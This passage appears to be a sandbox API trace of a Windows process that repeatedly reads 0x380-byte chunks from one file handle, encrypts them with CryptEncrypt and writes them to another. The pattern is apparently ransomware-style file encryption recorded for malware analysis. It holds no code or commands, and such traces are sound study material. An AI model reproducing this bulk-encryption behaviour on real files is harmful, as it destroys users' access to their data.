pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.691] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.691] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.692] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.692] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.692] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.692] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.692] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.692] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.692] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.692] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.692] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.692] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.692] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.692] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.693] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.693] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.693] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.693] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.693] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.693] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.693] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.693] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.693] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.693] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.693] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.693] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.694] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.694] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.694] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.694] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.694] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.694] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.694] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.694] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.694] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.694] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.694] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.694] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.694] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.695] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.695] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.695] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.695] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.695] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.695] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.695] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.695] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.695] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.695] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.695] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.695] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.696] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.696] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.696] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.696] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.696] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.696] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.696] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.696] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.696] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.696] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.696] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.696] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.696] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.697] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.697] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.697] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.697] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.697] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.697] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.697] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.697] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.697] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.697] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.697] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.697] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.698] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.698] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.698] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.698] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.698] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.698] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.698] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.698] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.698] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.698] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.698] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.698] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.699] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.699] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.699] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.699] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.699] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.699] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.699] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.699] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.699] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.699] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.699] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.699] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.699] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.700] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.700] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.700] ReadFile (in: hFile=0x5d48, 